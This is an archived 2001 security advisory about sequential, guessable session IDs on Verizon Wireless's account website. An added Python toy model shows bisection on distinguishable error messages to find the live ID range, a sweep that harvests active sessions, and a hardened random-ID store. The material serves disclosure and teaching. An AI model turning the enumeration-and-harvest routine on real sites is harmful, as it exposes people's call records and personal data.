[NEWS] Verizon Wireless Website Suffers from Gaping Privacy Holes
From: support@securiteam.com
To: list@securiteam.com
Subject: [NEWS] Verizon Wireless Website Suffers from Gaping Privacy Holes
Message-Id: <20010911072721.715DE138C0@mail.der-keiler.de>
Date: Tue, 11 Sep 2001 09:27:21 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Verizon Wireless Website Suffers from Gaping Privacy Holes
------------------------------------------------------------------------
SUMMARY
The Verizon Wireless web site allows cell phone owners to view their account
information. Because of a flaw in the way Verizon assigns session IDs, it is
possible to hijack another user's existing session and obtain sensitive
information about the phone's owner (phone number, name, recent calls
made, and more).
DETAILS
Verizon Wireless (a large US cell service provider) has a website that
allows you to access your account, and do things such as view your bills
and recent usage, and modify your service.
Cell phone bills are often very interesting, since they contain names,
addresses, and a complete record of calls placed and received, along with
the approximate location the user was when the call was made.
A typical URL used by this "my account" service is:
Note the p_session_id parameter. It is the only session identifier used.
Session IDs are assigned sequentially to users as they log in, and remain
valid until the user logs out or the session times out. Obviously, this makes
it trivial to access other users' sessions by guessing the session ID, and an
automated tool that harvests account data in bulk as users log in over time
is just as trivial to write.
Vendor status:
Verizon Wireless was notified about this on August 19th. They are working
on a remedy to the vulnerability.
Finding the right Session ID:
If you pick a session ID below the current range, you get the message
"Unable to validate URL". If you try one above the current range, you get
"Unable to find URL". The two distinct messages act as an above/below oracle,
so the current valid session ID range can be found by bisection in a handful
of requests, even by hand.
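The following is an added example and is not Verizon's code or part of the
original advisory. It is a toy session store that reproduces the two flaws the
advisory describes (a sequential counter as the session ID, and error messages
that differ depending on whether a guess is below or above the live range),
the bisection an attacker can run against that oracle, the downward sweep that
harvests every live session, and a hardened store beside it. Every class, name
and error string here is constructed for illustration; nothing was observed
on the real site.

```python
"""Toy model of sequential session IDs plus a range-leaking oracle, the
attack against it, and the hardened variant. Constructed example; the
error strings are the ones quoted in the advisory, the rest is assumed."""
import secrets

VALIDATE_ERR = "Unable to validate URL"  # advisory: ID below current range
FIND_ERR = "Unable to find URL"          # advisory: ID above current range
GENERIC_ERR = "Session invalid"          # assumed message for the hardened store


class SequentialSessionStore:
    """Mimics the flawed design: a counter hands out IDs, and two different
    error strings reveal which side of the live range a guess falls on."""

    def __init__(self, start=1000):
        self._next = start     # next ID to be issued
        self._sessions = {}    # session id -> account record

    def login(self, account):
        sid = self._next
        self._next += 1
        self._sessions[sid] = account
        return sid

    def logout(self, sid):
        self._sessions.pop(sid, None)

    def lookup(self, sid):
        """One 'my account' request. Returns (status, payload)."""
        if sid in self._sessions:
            return ("ok", self._sessions[sid])
        if sid >= self._next:
            return ("error", FIND_ERR)       # leaks: nothing issued this high yet
        return ("error", VALIDATE_ERR)       # leaks: issued, but expired/logged out


def find_upper_bound(oracle, lo=0, hi=1 << 31):
    """Bisect for the first ID that answers FIND_ERR, i.e. the next ID the
    server will hand out. Each probe is one HTTP request in the real attack,
    so a 2^31 space costs about 31 requests instead of billions."""
    probes = 0
    while lo < hi:
        mid = (lo + hi) // 2
        status, msg = oracle(mid)
        probes += 1
        if status == "error" and msg == FIND_ERR:
            hi = mid          # mid is above the range
        else:
            lo = mid + 1      # live or expired: mid is at/below the range
    return lo, probes


def harvest(oracle, upper, window=200):
    """Sweep downward from the top of the range and collect every live
    session. Sessions expire, so the live ones cluster just under `upper`;
    `window` bounds how far back to look."""
    found = {}
    for sid in range(upper - 1, max(upper - window, -1), -1):
        status, payload = oracle(sid)
        if status == "ok":
            found[sid] = payload
    return found


class RandomSessionStore:
    """Hardened variant: 256-bit CSPRNG session IDs and a single error
    message, so a guess reveals nothing about other sessions."""

    def __init__(self):
        self._sessions = {}

    def login(self, account):
        sid = secrets.token_urlsafe(32)   # 32 random bytes, base64url encoded
        self._sessions[sid] = account
        return sid

    def logout(self, sid):
        self._sessions.pop(sid, None)

    def lookup(self, sid):
        account = self._sessions.get(sid)
        if account is None:
            return ("error", GENERIC_ERR)  # same answer for every miss
        return ("ok", account)


def demo():
    """Run the attack against the flawed store; returns what it recovered."""
    store = SequentialSessionStore(start=1000)
    ids = [store.login({"name": f"subscriber{i}"}) for i in range(5)]
    store.logout(ids[2])                    # one user has already logged out
    upper, probes = find_upper_bound(store.lookup)
    return upper, probes, harvest(store.lookup, upper, window=50)


if __name__ == "__main__":
    upper, probes, found = demo()
    print(f"next id {upper} located in {probes} probes; live sessions: {sorted(found)}")
```

The bisection only works because the two error messages are distinguishable;
with the hardened store the attacker has no oracle and a 256-bit space to
guess in, which is why the fix needs both unpredictable IDs and a uniform
error response, not just one of them.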
ADDITIONAL INFORMATION
The information has been provided by <mailto:marcs@znep.com> Marc Slemko
and <mailto:steve.shockley@shockley.net> Steve Shockley.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.